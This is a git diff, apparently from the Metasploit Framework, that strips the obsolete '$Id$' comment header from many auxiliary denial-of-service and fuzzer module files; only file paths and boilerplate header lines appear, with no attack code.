a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 64d689a126..712726060b 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 65cfc1d43d..8975a00416 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index 41dedf777d..c15e9a4629 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index 957b1d76e4..e323a3e57b 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 66594d6bcc..1338ed66d9 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb index 2cf0c4313f..213a0c6071 100644 --- a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb +++ b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 6c058fb8c4..86c1735ea9 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 283fb2f78c..7c10104db9 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb index 9658cbdd1d..bd62c4bc75 100644 --- a/modules/auxiliary/dos/wifi/fakeap.rb +++ b/modules/auxiliary/dos/wifi/fakeap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb index aa2bdd1008..752e5cfb6a 100644 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ b/modules/auxiliary/dos/wifi/file2air.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index 1deaf5eecc..2352e42071 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index a4c3028e9f..e6870ba9a8 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb index aadf4ad003..359fb63bd6 100644 --- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb +++ b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb index 6d00b6e210..bec86a8a93 100644 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb index 350cef40f5..186b273fe5 100644 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ b/modules/auxiliary/dos/wifi/wifun.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 382f56db4f..de6ec7d0a4 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 035163abec..4c682d2f99 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 75ba28552e..36b89523b8 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index f4ffbb1c95..b87a9aac17 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index a22fbf5b85..8739ab1801 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index 0a76c4ad62..36ccebcec5 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index 7e4f8f1b6f..d0ae038af7 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index 76f363880f..3c051fa0e6 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 0df99d2953..15243d32a4 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index 9c3eca5167..6a3ce7c254 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index e9b97b3d84..c3f8aceff4 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index 446e5de70f..7059e5b82f 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index 085ba760f8..105ff5a485 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index 0c169539fb..bbf8c29ba8 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index c276f5a10d..df1027ed2a 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index cc4664d164..31c6ff687b 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index c67f0845dc..f94348f2cc 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 7b50574cec..c0fad55612 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index 714a9eb4af..e074974619 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index b689c8ef69..97693a41c3 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 35fba87753..cd837b0d29 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 117af06ff4..60143c163c 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index 0d488b31bf..cd98f9e624 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index c9766b1274..b9ad315e8b 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -1,8 +1,4 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index a60fe801ca..b4b114e4f9 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index a898ac500d..2f6044abbb 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 7098c5d53d..d7a232b869 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index 018c76d024..bddcb44fce 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index e06089e4e3..96405495c0 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index f54a55de71..bc48fa2222 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 3376889a86..48b8e78e12 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index 8bb395547c..d2cc3f001e 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index ee8b2b91a0..c22f5cd104 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index 85c138d594..eb36776636 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index 00ca0eeb90..3a871d71d4 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 5b6e2e2c1f..2909191044 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 8b563acdb3..73e9530a36 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index c975c7ccb1..2ec6877a1c 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index c52a775d3a..5238b92149 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 841e8d5062..85b40bd192 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 92ba4f7259..641eaa2531 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index c427c69871..a4f3472827 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 4610d4ed83..c13b8f52bd 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index 1ab8eef29e..075dfdaa17 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index b61b672b72..f1f10da97d 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 24e8b7b396..eb7921ccde 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # A Very simple Module to fuzzer some SMTP commands. # It allows to respect the order or just throw everything at it.... diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 22c1ea02e7..ef10e279d8 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index 99f16bf75f..8073335044 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index bee21d2c91..6e024449f6 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 3d77f01b5f..68172b2e6d 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 57bb4a3707..ce7a76fd3d 100644 